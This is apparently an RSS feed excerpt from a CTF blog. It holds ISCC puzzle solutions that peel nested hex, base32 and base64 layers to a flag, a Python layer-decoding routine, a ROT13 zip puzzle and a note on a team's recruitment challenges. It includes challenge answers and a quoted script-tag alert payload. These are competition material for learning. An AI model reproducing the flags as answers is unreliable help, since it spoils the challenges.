<pre class="highlight"><code>GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E
</code></pre>
</div>
</div>
<p>base32</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D
</code></pre>
</div>
</div>
<p>hex</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==
</code></pre>
</div>
</div>
<p>base64</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====
</code></pre>
</div>
</div>
<p>base32</p>
<div class="highlighter-rouge">
<div class="highlight">
<pre class="highlight"><code>463161395F69735F493563635F5A4F6C385F4733545030314E54
</code></pre>
</div>
</div>
<p>hex</p>
<p><code class="highlighter-rouge">F1a9_is_I5cc_ZOl8_G3TP01NT</code></p>
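<p>The layer peeling done by hand in the base64/base32/hex chains above, plus the UTF-16 base64 password blob from the ISCC web writeup earlier in this feed, handled by one Python routine. This is an added example, not the author's code: it picks the alphabet (hex, then base32, then base64, since those alphabets nest, so the order alone resolves the ambiguity), restores missing padding, detects UTF-16 by the alternating NUL bytes, and stops once the output no longer looks encoded; the two inputs are strings quoted on the page.</p>

```python
import base64
import re

def classify(s):
    """Alphabet check; hex and base32 come first since both are subsets of base64's alphabet."""
    if re.fullmatch(r"[0-9A-Fa-f]+", s) and len(s) % 2 == 0:
        return "hex"
    if re.fullmatch(r"[A-Z2-7]+=*", s):
        return "base32"
    if re.fullmatch(r"[A-Za-z0-9+/]+=*", s):
        return "base64"
    return None

def decode_layer(kind, s):
    """Decode one layer, restoring the padding the quoted JS blob lacks."""
    if kind == "hex":
        return bytes.fromhex(s)
    if kind == "base32":
        return base64.b32decode(s + "=" * (-len(s) % 8))
    return base64.b64decode(s + "=" * (-len(s) % 4))

def to_text(raw):
    """UTF-16 when every other byte is NUL (the JS blob), else ASCII."""
    if len(raw) >= 4 and len(raw) % 2 == 0:
        if all(b == 0 for b in raw[0::2]):
            return raw.decode("utf-16-be")
        if all(b == 0 for b in raw[1::2]):
            return raw.decode("utf-16-le")
    return raw.decode("ascii")

def peel(blob):
    """Strip layers until the text no longer looks encoded; returns (text, layers)."""
    cur, layers = blob.strip(), []
    while True:
        compact = re.sub(r"\s+", "", cur)  # encoded blobs are often line-wrapped
        kind = classify(compact)
        try:
            nxt = to_text(decode_layer(kind, compact)) if kind else None
        except ValueError:  # bad padding / non-hex / undecodable bytes
            nxt = None
        if nxt is None or not nxt.isprintable():
            return cur, layers
        layers.append(kind)
        cur = nxt.strip()

# Strings quoted on the page: the nested blob from "A Cat's Mind" and the JS password blob
CAT_BLOB = "R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ=="
JS_BLOB = "ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAHAAYQBzAHMAdwBvAHIAZAA6AHgAaQBuAHkAaQBqAGkALgBjAG8AbQAiACkAPAAvAHMAYwByAGkAcAB0AD4"
if __name__ == "__main__":
    print(peel(CAT_BLOB), peel(JS_BLOB))
```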
<h2 id="暴力xx不可取">Brute Force Won't Do</h2>
<p>A zip file, presumably pseudo-encrypted</p>
<p>ZipCenOp.jar</p>
<p>Unzip it and open flag.txt</p>
<p><code class="highlighter-rouge">vfppjrnerpbzvat</code></p>
<p>Caesar shift; try each one in turn</p>
<p><code class="highlighter-rouge">isccwearecoming</code></p>
<p>It was a shift of 13</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
<title>2018-05-11 CTF Core Review Challenge Source Code and Members' Writeups</title>
		<link>/ctf/414.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 15 May 2018 13:40:48 +0000</pubDate>
<category><![CDATA[CTF Notes]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[Writeup]]></category>
		<guid isPermaLink="false">/?p=357</guid>

<description><![CDATA[Fresh blood recruited! After 4 days the core-team entry review is finally over; looking back at the CTF challenges we set: http://118.126.113.78/ web1 by ur10ser This one was solved the moment it went live, and then...]]></description>
<content:encoded><![CDATA[<blockquote><p>Fresh blood recruited!<br />
After 4 days the core-team entry review is finally over; looking back at the <span class="wpcom_tag_link"><a href="/tags/ctf" title="CTF" target="_blank">CTF</a></span> challenges we set: <a href="http://118.126.113.78/">http://118.126.113.78/</a></p></blockquote>
<h1>web1 by ur10ser</h1>
<p>This challenge was solved the moment it went live; then I found I had forgotten to call a filter function # (ouch), how embarrassing</p>
<p>Tested skills: PHP pseudo-protocols (stream wrappers) and blind injection</p>
<p>For the detailed solution see the <a href="https://pan.chabug.org/CTF/2018-05-11CTF%E6%A0%B8%E5%BF%83%E9%A2%98/%E6%88%90%E5%91%98%E8%A7%A3%E9%A2%98Writeup/">members' solution writeup</a></p>
<h1>web2 by X1r0z</h1>
<p>For the solution see <a href="https://pan.chabug.org/CTF/2018-05-11CTF%E6%A0%B8%E5%BF%83%E9%A2%98/%E6%88%90%E5%91%98%E8%A7%A3%E9%A2%98Writeup/">X1r0z's writeup</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
